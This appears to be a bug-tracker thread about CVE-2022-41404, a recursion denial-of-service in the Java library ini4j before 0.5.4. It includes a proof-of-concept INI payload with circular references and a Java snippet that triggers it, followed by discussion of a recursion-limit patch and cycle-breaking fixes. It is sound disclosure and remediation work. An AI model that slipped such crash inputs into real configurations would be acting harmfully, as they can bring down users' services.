The package org.ini4j before 0.5.4 are vulnerable to get value via the...
Brought to you by:
szkiba
Test logic usable to reproduce the behaviour
payload:
----payload.ini
[dopey]
weight = ${bashful/weight}
height = ${doc/height}
[bashful]
weight = ${dopey/weight}
height = ${dopey/height}
[doc]
weight = 49.5
height = 87.7
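----java poc
import java.io.File;
import java.io.FileReader;
import org.ini4j.Ini;

// Load the payload above, then fetch a value whose references point at each other.
Ini ini = new Ini();
ini.load(new FileReader(new File("/Users/bingdian/IdeaProjects/soot/src/main/java/test.ini")));
ini.get("dopey").fetch("weight");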
@szkiba, @bingdian: the description mentions that the issue is present before version 0.5.4. Can you elaborate where the issue was fixed landing in that version?
I have taken a quick look at the source code; the problem seems to come from the recursive calls from the BasicProfileSection.fetch and BasicProfile.resolve methods... recursive loop is still present in version 0.54, without any limitation.
I tried to limit the number of recursions.
Can this modification solve the above problem?
https://github.com/SuperMap/ini4j/commit/917865af0244c32fafe9939fe69af6577f9a6077
Last edit: paradox 2022-12-09
This issue was assigned CVE-2022-41404.
It would be great to resolve this issue - can the project maintainer please accept the requested change and make a release?
You’ve got a circular reference error:
[dopey]
weight = ${bashful/weight}
[bashful]
weight = ${dopey/weight}
Those two point to each other, causing infinite recursion.
✅ Fix:
Break the cycle by referencing a concrete value, e.g.:
[dopey]
weight = ${doc/weight}
[bashful]
weight = ${doc/weight}
Or detect and reject circular refs in code.
Last edit: Robert Nile 2025-06-29
Good catch — the recursive loop explanation and payload example make this vulnerability very clear. A proper recursion limit or cycle detection is essential to prevent DoS.